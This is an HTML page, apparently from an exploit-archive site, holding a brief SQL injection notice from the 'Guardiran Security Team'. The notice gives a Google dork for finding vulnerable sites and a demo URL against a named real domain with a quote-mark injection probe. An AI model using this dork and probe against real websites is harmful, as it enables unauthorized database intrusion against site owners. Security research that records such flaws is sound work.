<html>
    <head>
        <link rel="shortcut icon" href="https://mr-msa.xyz/IMG/icon.png" type="image/x-icon">
        <style>
            html
            {
                background-color:black;
            }
            pre
            {
                color:green;
                font-size:11pt;
            }
            a
            {
                text-decoration:none;
            }
            button
            {
                background-color:green;
                width:200px;
                height:40px;
                color:#FFF;
                border:1px solid #999;
                border-radius:4px;
                
            }
            .back
            {
                width:60px;
            }
        </style>
        <title>exploit-10</title>
    </head>
    <body>
        <center>
                <a  href="exploit-10" download>
                    <button>
                    Download
                    </button>
                </a>
                <a href="../database">
                    <button class="back">
                    Back
                    </button>
                </a>
        </center>
        <pre>

# Exploit Title :ir Web Design spr.php icanano.ir SQL Injection
# Exploit Author : Guardiran Security Team 
# Vendor Homepage :http://icanano.ir
# Google Dork : "loadpsb.php?id="
# my team: Guardiran Security Team 
# category : webapps
# Tested on : Win8 , Kali Linux
# me:rednofozi@yahoo.com
# Discovered by : Rednofozi



Proof of Concept :
search google Dork : "loadpsb.php?id="
Demo :http://icanano.ir/news.php?id=2' injct


guardiran hackers
tnx to :REX , DeMoN, C0d3!Nj3ct!0n ,Mr.Python , virtual_hate Comrade،, JOK3R ,  Ruiner , mr_null -  F4LL3N
        </pre>
    </body>
</html>